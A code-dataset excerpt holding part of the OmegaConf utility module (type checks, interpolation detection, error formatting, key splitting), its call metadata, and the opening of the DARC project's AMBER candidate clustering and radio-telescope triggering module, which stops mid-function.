def _is_missing_literal(value: Any) -> bool:
# Uses literal '???' instead of the MISSING const for performance reasons.
return isinstance(value, str) and value == "???"
def _is_none(
value: Any, resolve: bool = False, throw_on_resolution_failure: bool = True
) -> bool:
from omegaconf import Node
if not isinstance(value, Node):
return value is None
if resolve:
value = value._maybe_dereference_node(
throw_on_resolution_failure=throw_on_resolution_failure
)
if not throw_on_resolution_failure and value is None:
# Resolution failure: consider that it is *not* None.
return False
assert isinstance(value, Node)
return value._is_none()
def get_value_kind(
value: Any, strict_interpolation_validation: bool = False
) -> ValueKind:
"""
Determine the kind of a value
Examples:
VALUE: "10", "20", True
MANDATORY_MISSING: "???"
INTERPOLATION: "${foo.bar}", "${foo.${bar}}", "${foo:bar}", "[${foo}, ${bar}]",
"ftp://${host}/path", "${foo:${bar}, [true], {'baz': ${baz}}}"
:param value: Input to classify.
:param strict_interpolation_validation: If `True`, then when `value` is a string
containing "${", it is parsed to validate the interpolation syntax. If `False`,
this parsing step is skipped: this is more efficient, but will not detect errors.
"""
if _is_missing_value(value):
return ValueKind.MANDATORY_MISSING
value = _get_value(value)
# We identify potential interpolations by the presence of "${" in the string.
# Note that escaped interpolations (ex: "esc: \${bar}") are identified as
# interpolations: this is intended, since they must be processed as interpolations
# for the string to be properly un-escaped.
# Keep in mind that invalid interpolations will only be detected when
# `strict_interpolation_validation` is True.
if isinstance(value, str) and "${" in value:
if strict_interpolation_validation:
# First try the cheap regex matching that detects common interpolations.
if SIMPLE_INTERPOLATION_PATTERN.match(value) is None:
# If no match, do the more expensive grammar parsing to detect errors.
parse(value)
return ValueKind.INTERPOLATION
else:
return ValueKind.VALUE
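# Quick illustration mirroring the docstring above (example inputs assumed):
# get_value_kind("10")         -> ValueKind.VALUE
# get_value_kind("???")        -> ValueKind.MANDATORY_MISSING
# get_value_kind("${foo.bar}") -> ValueKind.INTERPOLATION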
# DEPRECATED: remove in 2.2
def is_bool(st: str) -> bool:
st = str.lower(st)
return st == "true" or st == "false"
def is_float(st: str) -> bool:
try:
float(st)
return True
except ValueError:
return False
def is_int(st: str) -> bool:
try:
int(st)
return True
except ValueError:
return False
# DEPRECATED: remove in 2.2
def decode_primitive(s: str) -> Any:
if is_bool(s):
return str.lower(s) == "true"
if is_int(s):
return int(s)
if is_float(s):
return float(s)
return s
def is_primitive_list(obj: Any) -> bool:
from .base import Container
return not isinstance(obj, Container) and isinstance(obj, (list, tuple))
def is_primitive_dict(obj: Any) -> bool:
t = get_type_of(obj)
return t is dict
def is_dict_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Dict or type_ is Dict # pragma: no cover
else: # pragma: no cover
        # TypedDict is a bit hard to detect.
        # This support is tentative; if it eventually causes issues in other areas it may be dropped.
typed_dict = hasattr(type_, "__base__") and type_.__base__ == dict
return origin is dict or typed_dict
def is_list_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is List or type_ is List # pragma: no cover
else:
return origin is list # pragma: no cover
def is_tuple_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Tuple or type_ is Tuple # pragma: no cover
else:
return origin is tuple # pragma: no cover
def is_dict_subclass(type_: Any) -> bool:
return type_ is not None and isinstance(type_, type) and issubclass(type_, Dict)
def is_dict(obj: Any) -> bool:
return is_primitive_dict(obj) or is_dict_annotation(obj) or is_dict_subclass(obj)
def is_primitive_container(obj: Any) -> bool:
return is_primitive_list(obj) or is_primitive_dict(obj)
def get_list_element_type(ref_type: Optional[Type[Any]]) -> Any:
args = getattr(ref_type, "__args__", None)
if ref_type is not List and args is not None and args[0]:
element_type = args[0]
else:
element_type = Any
return element_type
def get_dict_key_value_types(ref_type: Any) -> Tuple[Any, Any]:
args = getattr(ref_type, "__args__", None)
if args is None:
bases = getattr(ref_type, "__orig_bases__", None)
if bases is not None and len(bases) > 0:
args = getattr(bases[0], "__args__", None)
key_type: Any
element_type: Any
if ref_type is None or ref_type == Dict:
key_type = Any
element_type = Any
else:
if args is not None:
key_type = args[0]
element_type = args[1]
else:
key_type = Any
element_type = Any
return key_type, element_type
def valid_value_annotation_type(type_: Any) -> bool:
return type_ is Any or is_primitive_type(type_) or is_structured_config(type_)
def _valid_dict_key_annotation_type(type_: Any) -> bool:
from omegaconf import DictKeyType
return type_ is None or type_ is Any or issubclass(type_, DictKeyType.__args__) # type: ignore
def is_primitive_type(type_: Any) -> bool:
type_ = get_type_of(type_)
return issubclass(type_, Enum) or type_ in (int, float, bool, str, type(None))
def _is_interpolation(v: Any, strict_interpolation_validation: bool = False) -> bool:
if isinstance(v, str):
ret = (
get_value_kind(v, strict_interpolation_validation)
== ValueKind.INTERPOLATION
)
assert isinstance(ret, bool)
return ret
return False
def _get_value(value: Any) -> Any:
from .base import Container
from .nodes import ValueNode
if isinstance(value, ValueNode):
return value._value()
elif isinstance(value, Container):
boxed = value._value()
if boxed is None or _is_missing_literal(boxed) or _is_interpolation(boxed):
return boxed
# return primitives and regular OmegaConf Containers as is
return value
def get_ref_type(obj: Any, key: Any = None) -> Optional[Type[Any]]:
from omegaconf import Container, Node
if isinstance(obj, Container):
if key is not None:
obj = obj._get_node(key)
else:
if key is not None:
raise ValueError("Key must only be provided when obj is a container")
if isinstance(obj, Node):
ref_type = obj._metadata.ref_type
if obj._is_optional() and ref_type is not Any:
return Optional[ref_type] # type: ignore
else:
return ref_type
else:
return Any # type: ignore
def _raise(ex: Exception, cause: Exception) -> None:
# Set the environment variable OC_CAUSE=1 to get a stacktrace that includes the
# causing exception.
env_var = os.environ["OC_CAUSE"] if "OC_CAUSE" in os.environ else None
debugging = sys.gettrace() is not None
full_backtrace = (debugging and not env_var == "0") or (env_var == "1")
if full_backtrace:
ex.__cause__ = cause
else:
ex.__cause__ = None
    raise ex.with_traceback(sys.exc_info()[2])  # set env OC_CAUSE=1 for full backtrace
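# Hypothetical shell usage (script name assumed): running `OC_CAUSE=1 python my_app.py`
# keeps the causing exception chained in the traceback instead of suppressing it.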
def format_and_raise(
node: Any,
key: Any,
value: Any,
msg: str,
cause: Exception,
type_override: Any = None,
) -> None:
from omegaconf import OmegaConf
from omegaconf.base import Node
if isinstance(cause, AssertionError):
raise
if isinstance(cause, OmegaConfBaseException) and cause._initialized:
ex = cause
if type_override is not None:
ex = type_override(str(cause))
ex.__dict__ = copy.deepcopy(cause.__dict__)
_raise(ex, cause)
object_type: Optional[Type[Any]]
object_type_str: Optional[str] = None
ref_type: Optional[Type[Any]]
ref_type_str: Optional[str]
child_node: Optional[Node] = None
if node is None:
full_key = key if key is not None else ""
object_type = None
ref_type = None
ref_type_str = None
else:
if key is not None and not node._is_none():
child_node = node._get_node(key, validate_access=False)
try:
full_key = node._get_full_key(key=key)
except Exception as exc:
# Since we are handling an exception, raising a different one here would
# be misleading. Instead, we display it in the key.
full_key = f"<unresolvable due to {type(exc).__name__}: {exc}>"
object_type = OmegaConf.get_type(node)
object_type_str = type_str(object_type)
ref_type = get_ref_type(node)
ref_type_str = type_str(ref_type)
msg = string.Template(msg).safe_substitute(
REF_TYPE=ref_type_str,
OBJECT_TYPE=object_type_str,
KEY=key,
FULL_KEY=full_key,
VALUE=value,
VALUE_TYPE=type_str(type(value), include_module_name=True),
KEY_TYPE=f"{type(key).__name__}",
)
if ref_type not in (None, Any):
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
reference_type=$REF_TYPE
object_type=$OBJECT_TYPE"""
)
else:
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
object_type=$OBJECT_TYPE"""
)
s = string.Template(template=template)
message = s.substitute(
REF_TYPE=ref_type_str, OBJECT_TYPE=object_type_str, MSG=msg, FULL_KEY=full_key
)
exception_type = type(cause) if type_override is None else type_override
if exception_type == TypeError:
exception_type = ConfigTypeError
elif exception_type == IndexError:
exception_type = ConfigIndexError
ex = exception_type(f"{message}")
if issubclass(exception_type, OmegaConfBaseException):
ex._initialized = True
ex.msg = message
ex.parent_node = node
ex.child_node = child_node
ex.key = key
ex.full_key = full_key
ex.value = value
ex.object_type = object_type
ex.object_type_str = object_type_str
ex.ref_type = ref_type
ex.ref_type_str = ref_type_str
_raise(ex, cause)
def type_str(t: Any, include_module_name: bool = False) -> str:
is_optional, t = _resolve_optional(t)
if t is None:
return type(t).__name__
if t is Any:
return "Any"
if t is ...:
return "..."
if sys.version_info < (3, 7, 0): # pragma: no cover
# Python 3.6
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t.__origin__ is not None:
name = type_str(t.__origin__)
else:
name = str(t)
if name.startswith("typing."):
name = name[len("typing.") :]
else: # pragma: no cover
# Python >= 3.7
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t._name is None:
if t.__origin__ is not None:
name = type_str(
t.__origin__, include_module_name=include_module_name
)
else:
name = str(t._name)
args = getattr(t, "__args__", None)
if args is not None:
args = ", ".join(
[type_str(t, include_module_name=include_module_name) for t in t.__args__]
)
ret = f"{name}[{args}]"
else:
ret = name
if include_module_name:
if (
hasattr(t, "__module__")
and t.__module__ != "builtins"
and t.__module__ != "typing"
and not t.__module__.startswith("omegaconf.")
):
module_prefix = t.__module__ + "."
else:
module_prefix = ""
ret = module_prefix + ret
if is_optional:
return f"Optional[{ret}]"
else:
return ret
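# Small illustration (example types assumed, outputs follow the logic above):
# type_str(int)           -> "int"
# type_str(Any)           -> "Any"
# type_str(Optional[int]) -> "Optional[int]"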
def _ensure_container(target: Any, flags: Optional[Dict[str, bool]] = None) -> Any:
from omegaconf import OmegaConf
if is_primitive_container(target):
assert isinstance(target, (list, dict))
target = OmegaConf.create(target, flags=flags)
elif is_structured_config(target):
target = OmegaConf.structured(target, flags=flags)
elif not OmegaConf.is_config(target):
raise ValueError(
"Invalid input. Supports one of "
+ "[dict,list,DictConfig,ListConfig,dataclass,dataclass instance,attr class,attr class instance]"
)
return target
def is_generic_list(type_: Any) -> bool:
"""
Checks if a type is a generic list, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_list_annotation(type_) and get_list_element_type(type_) is not None
def is_generic_dict(type_: Any) -> bool:
"""
Checks if a type is a generic dict, for example:
    dict returns False
    typing.Dict[KT, VT] returns True
:param type_: variable type
:return: bool
"""
return is_dict_annotation(type_) and len(get_dict_key_value_types(type_)) > 0
def is_container_annotation(type_: Any) -> bool:
return is_list_annotation(type_) or is_dict_annotation(type_)
def split_key(key: str) -> List[str]:
"""
Split a full key path into its individual components.
This is similar to `key.split(".")` but also works with the getitem syntax:
"a.b" -> ["a", "b"]
"a[b]" -> ["a, "b"]
".a.b[c].d" -> ["", "a", "b", "c", "d"]
"[a].b" -> ["a", "b"]
"""
# Obtain the first part of the key (in docstring examples: a, a, .a, '')
first = KEY_PATH_HEAD.match(key)
assert first is not None
first_stop = first.span()[1]
# `tokens` will contain all elements composing the key.
tokens = key[0:first_stop].split(".")
# Optimization in case `key` has no other component: we are done.
if first_stop == len(key):
return tokens
if key[first_stop] == "[" and not tokens[-1]:
# This is a special case where the first key starts with brackets, e.g.
# [a] or ..[a]. In that case there is an extra "" in `tokens` that we
# need to get rid of:
# [a] -> tokens = [""] but we would like []
# ..[a] -> tokens = ["", "", ""] but we would like ["", ""]
tokens.pop()
# Identify other key elements (in docstring examples: b, b, b/c/d, b)
others = KEY_PATH_OTHER.findall(key[first_stop:])
# There are two groups in the `KEY_PATH_OTHER` regex: one for keys starting
# with a dot (.b, .d) and one for keys starting with a bracket ([b], [c]).
# Only one group can be non-empty.
tokens += [dot_key if dot_key else bracket_key for dot_key, bracket_key in others]
return tokens
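# Sanity sketch based on the docstring examples above (not an exhaustive test):
# split_key("a.b")       -> ["a", "b"]
# split_key("a[b]")      -> ["a", "b"]
# split_key(".a.b[c].d") -> ["", "a", "b", "c", "d"]
# split_key("[a].b")     -> ["a", "b"]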
# Similar to Python 3.7+'s `contextlib.nullcontext` (which should be used instead,
# once support for Python 3.6 is dropped).
@contextmanager
def nullcontext(enter_result: Any = None) -> Iterator[Any]:
yield enter_result
| [((53, 16, 53, 42), 're.compile', 're.compile', ({(53, 27, 53, 41): '"""(\\\\.)*[^.[]*"""'}, {}), "('(\\\\.)*[^.[]*')", False, 'import re\n'), ((58, 17, 58, 52), 're.compile', 're.compile', ({(58, 28, 58, 51): '"""\\\\.([^.[]*)|\\\\[(.*?)\\\\]"""'}, {}), "('\\\\.([^.[]*)|\\\\[(.*?)\\\\]')", False, 'import re\n'), ((171, 10, 171, 36), 'importlib.import_module', 'import_module', ({(171, 24, 171, 35): 'module_path'}, {}), '(module_path)', False, 'from importlib import import_module\n'), ((292, 19, 292, 52), 'omegaconf.OmegaConf.create', 'OmegaConf.create', (), '', False, 'from omegaconf import OmegaConf\n'), ((341, 19, 341, 52), 'omegaconf.OmegaConf.create', 'OmegaConf.create', (), '', False, 'from omegaconf import OmegaConf\n'), ((343, 21, 343, 45), 'typing.get_type_hints', 'get_type_hints', ({(343, 36, 343, 44): 'obj_type'}, {}), '(obj_type)', False, 'from typing import Any, Dict, Iterator, List, Optional, Tuple, Type, Union, get_type_hints\n'), ((344, 17, 344, 40), 'dataclasses.fields', 'dataclasses.fields', ({(344, 36, 344, 39): 'obj'}, {}), '(obj)', False, 'import dataclasses\n'), ((388, 11, 388, 40), 'dataclasses.is_dataclass', 'dataclasses.is_dataclass', ({(388, 36, 388, 39): 'obj'}, {}), '(obj)', False, 'import dataclasses\n'), ((396, 11, 396, 24), 'attr.has', 'attr.has', ({(396, 20, 396, 23): 'obj'}, {}), '(obj)', False, 'import attr\n'), ((796, 8, 796, 42), 'string.Template', 'string.Template', (), '', False, 'import string\n'), ((144, 8, 153, 9), 're.compile', 're.compile', ({(145, 12, 151, 32): '"""^(?:\n [-+]?(?:[0-9][0-9_]*)\\\\.[0-9_]*(?:[eE][-+]?[0-9]+)?\n |[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)\n |\\\\.[0-9_]+(?:[eE][-+][0-9]+)?\n |[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\\\.[0-9_]*\n |[-+]?\\\\.(?:inf|Inf|INF)\n |\\\\.(?:nan|NaN|NAN))$"""', (152, 12, 152, 16): 're.X'}, {}), '(\n """^(?:\n [-+]?(?:[0-9][0-9_]*)\\\\.[0-9_]*(?:[eE][-+]?[0-9]+)?\n |[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)\n |\\\\.[0-9_]+(?:[eE][-+][0-9]+)?\n |[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\\\.[0-9_]*\n |[-+]?\\\\.(?:inf|Inf|INF)\n |\\\\.(?:nan|NaN|NAN))$"""\n , re.X)', False, 'import re\n'), ((243, 8, 249, 9), 'warnings.warn', 'warnings.warn', (), '', False, 'import warnings\n'), ((279, 16, 279, 42), 'attr.fields_dict', 'attr.fields_dict', ({(279, 33, 279, 41): 'obj_type'}, {}), '(obj_type)', False, 'import attr\n'), ((713, 16, 713, 30), 'sys.gettrace', 'sys.gettrace', ({}, {}), '()', False, 'import sys\n'), ((765, 22, 765, 46), 'omegaconf.OmegaConf.get_type', 'OmegaConf.get_type', ({(765, 41, 765, 45): 'node'}, {}), '(node)', False, 'from omegaconf import OmegaConf\n'), ((782, 19, 788, 9), 'textwrap.dedent', 'dedent', ({(783, 12, 787, 43): '""" $MSG\n full_key: $FULL_KEY\n reference_type=$REF_TYPE\n object_type=$OBJECT_TYPE"""'}, {}), '(\n """ $MSG\n full_key: $FULL_KEY\n reference_type=$REF_TYPE\n object_type=$OBJECT_TYPE"""\n )', False, 'from textwrap import dedent\n'), ((790, 19, 795, 9), 'textwrap.dedent', 'dedent', ({(791, 12, 794, 43): '""" $MSG\n full_key: $FULL_KEY\n object_type=$OBJECT_TYPE"""'}, {}), '(\n """ $MSG\n full_key: $FULL_KEY\n object_type=$OBJECT_TYPE"""\n )', False, 'from textwrap import dedent\n'), ((887, 17, 887, 54), 'omegaconf.OmegaConf.create', 'OmegaConf.create', (), '', False, 'from omegaconf import OmegaConf\n'), ((295, 24, 295, 50), 'attr.fields_dict', 'attr.fields_dict', ({(295, 41, 295, 49): 'obj_type'}, {}), '(obj_type)', False, 'import attr\n'), ((311, 22, 317, 13), 'omegaconf.omegaconf._maybe_wrap', '_maybe_wrap', (), '', False, 'from omegaconf.omegaconf import MISSING, 
OmegaConf, _maybe_wrap\n'), ((330, 36, 330, 59), 'dataclasses.fields', 'dataclasses.fields', ({(330, 55, 330, 58): 'obj'}, {}), '(obj)', False, 'import dataclasses\n'), ((365, 22, 371, 13), 'omegaconf.omegaconf._maybe_wrap', '_maybe_wrap', (), '', False, 'from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap\n'), ((719, 28, 719, 42), 'sys.exc_info', 'sys.exc_info', ({}, {}), '()', False, 'import sys\n'), ((740, 26, 740, 55), 'copy.deepcopy', 'copy.deepcopy', ({(740, 40, 740, 54): 'cause.__dict__'}, {}), '(cause.__dict__)', False, 'import copy\n'), ((771, 10, 771, 30), 'string.Template', 'string.Template', ({(771, 26, 771, 29): 'msg'}, {}), '(msg)', False, 'import string\n'), ((889, 17, 889, 58), 'omegaconf.OmegaConf.structured', 'OmegaConf.structured', (), '', False, 'from omegaconf import OmegaConf\n'), ((890, 13, 890, 40), 'omegaconf.OmegaConf.is_config', 'OmegaConf.is_config', ({(890, 33, 890, 39): 'target'}, {}), '(target)', False, 'from omegaconf import OmegaConf\n'), ((132, 26, 137, 21), 'yaml.constructor.ConstructorError', 'yaml.constructor.ConstructorError', ({(133, 24, 133, 54): '"""while constructing a mapping"""', (134, 24, 134, 39): 'node.start_mark', (135, 24, 135, 63): 'f"""found duplicate key {key_node.value}"""', (136, 24, 136, 43): 'key_node.start_mark'}, {}), "('while constructing a mapping', node.\n start_mark, f'found duplicate key {key_node.value}', key_node.start_mark)", False, 'import yaml\n'), ((260, 43, 266, 17), 'omegaconf.omegaconf._maybe_wrap', '_maybe_wrap', (), '', False, 'from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap\n')] |
loostrum/darc | darc/amber_clustering.py | 977f43652ff4fc873340d09ac0fddeb81b889541 | #!/usr/bin/env python3
#
# AMBER Clustering
import os
from time import sleep
import yaml
import ast
import threading
import multiprocessing as mp
import numpy as np
from astropy.time import Time, TimeDelta
import astropy.units as u
from astropy.coordinates import SkyCoord
from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer
from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT
from darc.external import tools
from darc import util
class AMBERClusteringException(Exception):
pass
class AMBERClustering(DARCBase):
"""
Trigger IQUV / LOFAR / VOEvent system based on AMBER candidates
1. Cluster incoming triggers
2. Apply thresholds (separate for known and new sources, and for IQUV vs LOFAR)
3. Put IQUV triggers on output queue
4. Put LOFAR triggers on remote LOFAR trigger queue and on VOEvent queue
"""
def __init__(self, *args, connect_vo=True, connect_lofar=True, **kwargs):
"""
:param bool connect_vo: Whether or not to connect to VOEvent queue on master node
:param bool connect_lofar: Whether or not to connect to LOFAR trigger queue on master node
"""
super(AMBERClustering, self).__init__(*args, **kwargs)
self.connect_vo = connect_vo
self.connect_lofar = connect_lofar
self.dummy_queue = mp.Queue()
self.threads = {}
self.hdr_mapping = {}
self.obs_config = None
self.observation_running = False
self.amber_triggers = []
self.source_list = None
self.lock = mp.Lock()
# store when we are allowed to do IQUV / LOFAR triggering
self.time_iquv = Time.now()
# connect to VOEvent generator
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
else:
# dummy queue
self.logger.info("VO Generator connection disabled, setting dummy queue")
self.vo_queue = mp.Queue()
self.have_vo = False
# connect to LOFAR trigger
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
else:
# dummy queue
self.logger.info("LOFAR Trigger connection disabled, setting dummy queue")
self.lofar_queue = mp.Queue()
self.have_lofar = False
def _load_source_list(self):
"""
Load the list with known source DMs
:return: source list with dict per category
"""
try:
with open(self.source_file, 'r') as f:
source_list = yaml.load(f, Loader=yaml.SafeLoader)
except OSError as e:
raise AMBERClusteringException("Cannot load source list: {}".format(e))
return source_list
def process_command(self, command):
"""
Process command received from queue
:param dict command: Command to process
"""
if command['command'] == 'trigger':
if not self.observation_running:
self.logger.error("Trigger(s) received but no observation is running - ignoring")
else:
with self.lock:
self.amber_triggers.append(command['trigger'])
elif command['command'] == 'get_attr':
self.get_attribute(command)
else:
self.logger.error("Unknown command received: {}".format(command['command']))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start listening for amber triggers on queue
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# clean any old triggers
self.amber_triggers = []
# parse parset
obs_config['parset'] = self._load_parset(obs_config)
# set config
self.obs_config = obs_config
self.observation_running = True
# (re)load source list in case of changes
self.source_list = self._load_source_list()
# try connecting to VO server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
        # try connecting to LOFAR trigger server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
# process triggers in thread
self.threads['processing'] = threading.Thread(target=self._process_triggers)
self.threads['processing'].start()
self.logger.info("Observation started")
def stop_observation(self, *args, **kwargs):
"""
Stop observation
"""
# set running to false
self.observation_running = False
# clear triggers
self.amber_triggers = []
# clear header
self.hdr_mapping = {}
# clear config
self.obs_config = None
# clear threads
for key, thread in self.threads.items():
if thread is not None:
thread.join()
self.threads[key] = None
def voevent_connector(self):
"""
Connect to the VOEvent generator on the master node
"""
# Load VO server settings
VOEventQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['voevent_generator']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = VOEventQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def lofar_connector(self):
"""
Connect to the LOFAR triggering system on the master node
"""
# Load LOFAR trigger server settings
LOFARTriggerQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['lofar_trigger']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = LOFARTriggerQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def _get_source(self):
"""
Try to get DM for a known source
:return: DM for known source, else None
"""
# get source name from parset
try:
source = self.obs_config['parset']['task.source.name']
except KeyError:
self.logger.error("Cannot get source name from parset, will not do known-source triggering")
return None, None, None
# check if source is in source list
# first check aliases
try:
alias = self.source_list['aliases'][source]
except KeyError:
# not found
pass
else:
# replace source by alias so we can look it up in other lists
self.logger.info("Using alias {} for source {}".format(alias, source))
source = alias
# check if source is a known pulsar or frb
dm_src = None
src_type = None
for key in ['pulsars', 'frbs']:
try:
dm_src = self.source_list[key][source]
src_type = key[:-1]
except KeyError:
pass
else:
break
return dm_src, src_type, source
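    # Hypothetical shape of the source list implied by the lookups above
    # (source names and DM values are assumed, purely illustrative):
    #   aliases: {B0531+21: CRAB}
    #   pulsars: {CRAB: 56.8}
    #   frbs:    {FRB_EXAMPLE: 349.0}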
def _check_triggers(self, triggers, sys_params, utc_start, datetimesource, dm_min=0, dm_max=np.inf, dm_src=None,
width_max=np.inf, snr_min=8, src_type=None, src_name=None, dmgal=0, pointing=None,
skip_lofar=False):
"""
Cluster triggers and run IQUV and/or LOFAR triggering
:param list triggers: Raw triggers
:param dict sys_params: System parameters (dt, delta_nu_MHz, nu_GHz)
:param str utc_start: start time of observation, in format readable by astropy.time.Time
:param str datetimesource: Field name with date and time
:param float dm_min: minimum DM (default: 0)
:param float dm_max: maximum DM (default: inf)
:param float dm_src: DM of known source (default: None)
:param float width_max: maximum width (default: inf)
        :param float snr_min: minimum S/N (default: 8)
:param str src_type: Source type (pulsar, frb, None)
:param str src_name: Source name (default: None)
:param float dmgal: galactic maximum DM
:param astropy.coordinates.SkyCoord pointing: Pointing for LOFAR triggering (default: None)
:param bool skip_lofar: Skip LOFAR triggering (default: False)
"""
# cluster using IQUV thresholds
# LOFAR thresholds are assumed to be more strict for every parameter
cluster_snr, cluster_dm, cluster_time, cluster_downsamp, cluster_sb, _, ncand_per_cluster = \
tools.get_triggers(triggers,
dm_min=dm_min, dm_max=dm_max, sig_thresh=snr_min, t_window=self.clustering_window,
read_beam=True, return_clustcounts=True, sb_filter=self.sb_filter,
sb_filter_period_min=self.sb_filter_period_min,
sb_filter_period_max=self.sb_filter_period_max,
**sys_params)
# select on width
mask = np.array(cluster_downsamp) <= width_max
cluster_snr = np.array(cluster_snr)[mask]
cluster_dm = np.array(cluster_dm)[mask]
cluster_time = np.array(cluster_time)[mask]
cluster_downsamp = np.array(cluster_downsamp)[mask].astype(int)
cluster_sb = np.array(cluster_sb)[mask].astype(int)
ncand_per_cluster = np.array(ncand_per_cluster)[mask].astype(int)
ncluster = len(cluster_snr)
if src_type is not None:
known = 'known'
else:
known = 'new'
self.logger.info("Clustered {} raw triggers into {} IQUV trigger(s) "
"for {} source".format(len(triggers), ncluster, known))
# return if there are no clusters
if ncluster == 0:
return
# there are clusters, do IQUV triggering
# check if we can do triggering
now = Time.now()
if now < self.time_iquv:
self.logger.warning("Cannot trigger IQUV yet, next possible time: {}".format(self.time_iquv))
else:
self.logger.info("Sending IQUV trigger")
# update last trigger time
self.time_iquv = now + TimeDelta(self.thresh_iquv['interval'], format='sec')
# trigger IQUV
dada_triggers = []
for i in range(ncluster):
# send known source dm if available
if dm_src is not None:
dm_to_send = dm_src
else:
dm_to_send = cluster_dm[i]
dada_trigger = {'stokes': 'IQUV', 'dm': dm_to_send, 'beam': cluster_sb[i],
'width': cluster_downsamp[i], 'snr': cluster_snr[i],
'time': cluster_time[i], 'utc_start': utc_start}
dada_triggers.append(dada_trigger)
self.target_queue.put({'command': 'trigger', 'trigger': dada_triggers})
# skip LOFAR triggering for pulsars or if explicitly disabled
if src_type == 'pulsar' or skip_lofar:
return
# select LOFAR thresholds
if src_type is not None:
# known source, use same DM threshold as IQUV, but apply width and S/N thresholds
# DM_min effectively does nothing here because the value is the same as for IQUV
# but it needs to be defined for the mask = line below to work
# no limit on candidates per cluster
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = dm_min
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = np.inf
# Overrides for specific sources
if src_name in self.lofar_trigger_sources:
# check CB number
try:
allowed_cbs = self.thresh_lofar_override['cb']
if isinstance(allowed_cbs, float):
allowed_cbs = [allowed_cbs]
if self.obs_config['beam'] not in allowed_cbs:
return
except KeyError:
# any CB is valid if cb key is not present
pass
else:
# source known, CB valid: set thresholds
snr_min_lofar = self.thresh_lofar_override['snr_min']
width_max_lofar = self.thresh_lofar_override['width_max']
self.logger.warning("Setting LOFAR trigger thresholds: S/N > {}, "
"downsamp <= {}".format(snr_min_lofar, width_max_lofar))
else:
# new source, apply all LOFAR thresholds
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = max(dmgal * self.thresh_lofar['dm_frac_min'], self.dm_min_global)
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = self.thresh_lofar['max_cands_per_cluster']
# create mask for given thresholds
# also remove triggers where number of raw candidates is too high (this indicates RFI)
mask = (cluster_snr >= snr_min_lofar) & (cluster_dm >= dm_min_lofar) & \
(cluster_downsamp <= width_max_lofar) & \
(ncand_per_cluster <= max_cands_per_cluster)
# check for any remaining triggers
if np.any(mask):
ncluster = np.sum(mask)
self.logger.info("Found {} possible LOFAR trigger(s)".format(ncluster))
# note: the server keeps track of when LOFAR triggers were sent
# and whether or not a new trigger can be sent
# check if there are multiple triggers
if ncluster > 1:
self.logger.info("Multiple triggers - selecting trigger with highest S/N")
# argmax also works if there is one trigger, so just run it always
ind = np.argmax(cluster_snr[mask])
# estimate flux density based on peak S/N and width
snr = cluster_snr[mask][ind]
width = TSAMP.to(u.ms) * cluster_downsamp[mask][ind]
# astropy units only knows mJy, but the VOEvent Generator expects Jy
flux = util.get_flux(snr, width).to(u.mJy).value / 1000.
# select known source DM if available
if dm_src is not None:
dm_to_send = dm_src
dm_err = 0.
else:
dm_to_send = cluster_dm[mask][ind]
# set DM uncertainty to DM delay across pulse width
# Apertif has roughly 1 DM unit = 1 ms delay across band
dm_err = width.to(u.ms).value
# calculate arrival time at reference frequency = central frequency
cent_freq = sys_params['nu_GHz'] * 1000.
max_freq = cent_freq + .5 * BANDWIDTH.to(u.MHz).value
dm_delay = 4.148808E3 * dm_to_send * (cent_freq**-2 - max_freq**-2)
utc_arr = (utc_start + TimeDelta(cluster_time[mask][ind] - dm_delay, format='sec')).isot
# set a source name
if src_type is not None:
name = src_type
else:
name = 'candidate'
# check whether or not pointing information is available
